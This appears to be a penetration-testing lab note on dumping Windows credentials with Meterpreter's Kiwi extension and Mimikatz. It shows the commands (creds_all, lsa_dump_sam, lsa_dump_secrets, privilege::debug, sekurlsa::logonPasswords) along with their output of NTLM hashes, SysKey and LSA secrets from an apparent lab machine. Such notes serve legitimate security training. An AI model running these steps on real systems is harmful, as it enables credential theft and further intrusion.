MimiKatz,Kiwi
Last updated
Last updated
In the meterpreter session load Kiwi
load kiwi
helpRetrieve all credentials
Copy
creds_allmsv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator ATTACKDEFENSE e3c61a68f1b89ee6c8ba9507378dc88d fa62275e30d286c09d30d8fece82664eb34323ef
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
ATTACKDEFENSE$ WORKGROUP (null)
Administrator ATTACKDEFENSE (null)
# clear-text passwords are not stored on Win2016
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator ATTACKDEFENSE (null)
attackdefense$ WORKGROUP (null)Dump LSA SAM (NTLM hashes for all users)
lsa_dump_sam[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0blsa_dump_secrets[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local name : ATTACKDEFENSE ( S-1-5-21-3688751335-3073641799-161370460 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {47980b9c-8bd1-89c9-bfb5-0c4fca25e625}
[00] {47980b9c-8bd1-89c9-bfb5-0c4fca25e625} 247e7be223db5e50291fc0fcec276ff8236c32a8a6183c5a0d0b6b044590ce06
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 34 5e 65 80 f9 04 a4 8c a5 0e 6c 74 6c d2 c3 b8 8e 7a ca c3 a3 3b 0e 6e 0a 64 f3 12 fc c7 92 67 a3 2f d5 d1 e4 41 33 ac
full: 345e6580f904a48ca50e6c746cd2c3b88e7acac3a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
m/u : 345e6580f904a48ca50e6c746cd2c3b88e7acac3 / a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
old/hex : 01 00 00 00 c1 3a 28 e3 94 7b 64 5d 94 29 b4 c9 1c 9b 0c b1 b6 5a aa 2c 34 4d ee ed 86 74 0f 12 25 37 8c 38 69 b3 b4 53 b6 37 86 44
full: c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c344deeed86740f1225378c3869b3b453b6378644
m/u : c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c / 344deeed86740f1225378c3869b3b453b6378644
Secret : NL$KM
cur/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
old/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2cd C:\\
mkdir Temp
cd Temp
meterpreter > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shellRun mimikatz.exe
mimikatz.exe
privilege::debug
Privilege '20' OK
# I have the required privileges for hash extraction from memoryDump the cache of the lsass process
lsadump::samlsadump::secretsDisplay logon passwords, when stored in clear-text
in this case clear-text password are disabled - (null)
sekurlsa::logonPasswords
